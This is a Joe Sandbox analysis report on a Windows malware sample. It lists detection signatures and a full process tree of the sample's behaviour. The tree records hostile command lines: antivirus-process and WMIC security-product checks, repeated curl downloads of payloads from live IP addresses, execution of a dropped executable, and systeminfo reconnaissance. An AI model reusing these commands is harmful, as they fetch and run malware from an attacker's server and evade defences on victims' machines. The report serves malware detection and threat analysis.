Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vqMMwqCFZQ.exe

Overview

General Information

Sample name:vqMMwqCFZQ.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:5b14c48842c63552a468d3da9500bb34f3bbd1cd16decbc17a22ff0f2aada887
Analysis ID:1560430
MD5:8e55a7932d1b9649aba9d3e97ca688ce
SHA1:32afffa80d0f8778c8670f1b9996c602a81de455
SHA256:5b14c48842c63552a468d3da9500bb34f3bbd1cd16decbc17a22ff0f2aada887
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Copy itself to suspicious location via type command
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
AI detected suspicious sample
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Writes many files with high entropy
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Recon Command Output Piped To Findstr.EXE
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Usage Of Web Request Commands And Cmdlets
Too many similar processes found
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • vqMMwqCFZQ.exe (PID: 3496 cmdline: "C:\Users\user\Desktop\vqMMwqCFZQ.exe" MD5: 8E55A7932D1B9649ABA9D3E97CA688CE)
    • cmd.exe (PID: 6024 cmdline: "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5672 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3488 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 2520 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7004 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2936 cmdline: cmd /c md 139918 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 6712 cmdline: findstr /V "SyntaxMilesImperialTriple" Credits MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6164 cmdline: cmd /c copy /b ..\Asked + ..\Leaving + ..\During + ..\Chairman + ..\Bracket + ..\Label + ..\Perhaps v MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Ur.pif (PID: 2476 cmdline: Ur.pif v MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 3164 cmdline: "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\807 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 6932 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName MD5: E2DE6500DE1148C7F6027AD50AC8B891)
        • cmd.exe (PID: 2724 cmdline: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\807 > C:\Users\user\AppData\Local\temp\237 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 1072 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 5568 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 4480 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 6692 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 2484 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 6024 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 1544 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 2060 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 5368 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 3916 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
          • Conhost.exe (PID: 6116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4124 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 5932 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 4308 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fofqx" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 2104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 5448 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\fofqx" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 3020 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\zxfdn" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 6012 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\zxfdn" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 428 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gvhdi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 2124 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\gvhdi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 2836 cmdline: "C:\Windows\System32\cmd.exe" /C cd "C:\Users\user\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • azvw.exe (PID: 2664 cmdline: azvw.exe -o xhwq.zip MD5: 75375C22C72F1BEB76BEA39C22A1ED68)
            • Conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4092 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 2336 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
            • Conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2540 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\mncym" "178.215.224.74/v10/ukyh.php?jspo=31" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 6192 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\mncym" "178.215.224.74/v10/ukyh.php?jspo=31" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 6300 cmdline: "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • systeminfo.exe (PID: 6416 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
            • WmiPrvSE.exe (PID: 6660 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
            • Conhost.exe (PID: 6588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • findstr.exe (PID: 6528 cmdline: findstr /C:"OS Name" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • Conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7052 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lyvbm" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 6264 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\lyvbm" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 2008 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dxmcp" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 5828 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\dxmcp" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 5180 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 5172 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
            • Conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 5944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2520 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzizi" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 4476 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\hzizi" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 2756 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 772 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
          • Conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5568 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 4280 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
            • Conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4076 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\nefne" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 6696 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\nefne" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 3520 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\zxjrd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 1508 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\zxjrd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • RevenueDevices.exe (PID: 1892 cmdline: "C:\Users\user\AppData\Local\temp\RevenueDevices.exe" MD5: B487B5B51436B42576D60A1FE58F8399)
          • cmd.exe (PID: 5444 cmdline: "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 3592 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • cmd.exe (PID: 5068 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fntgj" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 1696 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\fntgj" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 2104 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jyffr" "178.215.224.74/v10/ukyh.php?gi" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 5632 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\jyffr" "178.215.224.74/v10/ukyh.php?gi" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 5848 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\wbqtj" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 428 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\wbqtj" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
            • Conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 2896 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
        • Conhost.exe (PID: 2248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Spreading

barindex
Sigma detected: Copy itself to suspicious location via type command
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\807 > C:\Users\user\AppData\Local\temp\237, CommandLine: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\807 > C:\Users\user\AppData\Local\temp\237, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: Ur.pif v, ParentImage: C:\Users\user\AppData\Local\Temp\139918\Ur.pif, ParentProcessId: 2476, ParentProcessName: Ur.pif, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\807 > C:\Users\user\AppData\Local\temp\237, ProcessId: 2724, ProcessName: cmd.exe

System Summary

barindex
Sigma detected: Execution of Suspicious File Type Extension
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Ur.pif v, CommandLine: Ur.pif v, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\139918\Ur.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\139918\Ur.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\139918\Ur.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6024, ParentProcessName: cmd.exe, ProcessCommandLine: Ur.pif v, ProcessId: 2476, ProcessName: Ur.pif
Sigma detected: Recon Command Output Piped To Findstr.EXE
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1, CommandLine: "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: Ur.pif v, ParentImage: C:\Users\user\AppData\Local\Temp\139918\Ur.pif, ParentProcessId: 2476, ParentProcessName: Ur.pif, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1, ProcessId: 6300, ProcessName: cmd.exe
Sigma detected: Suspicious Copy From or To System Directory
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\vqMMwqCFZQ.exe", ParentImage: C:\Users\user\Desktop\vqMMwqCFZQ.exe, ParentProcessId: 3496, ParentProcessName: vqMMwqCFZQ.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.bat, ProcessId: 6024, ProcessName: cmd.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6", CommandLine: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: Ur.pif v, ParentImage: C:\Users\user\AppData\Local\Temp\139918\Ur.pif, ParentProcessId: 2476, ParentProcessName: Ur.pif, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6", ProcessId: 1072, ProcessName: cmd.exe

HIPS / PFW / Operating System Protection Evasion

barindex
Sigma detected: Search for Antivirus process
Source: Process startedAuthor: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6024, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 7004, ProcessName: findstr.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-21T20:00:35.393060+010028537671Malware Command and Control Activity Detected192.168.2.449874178.215.224.7480TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-21T20:00:35.393060+010028537681A Network Trojan was detected192.168.2.449874178.215.224.7480TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

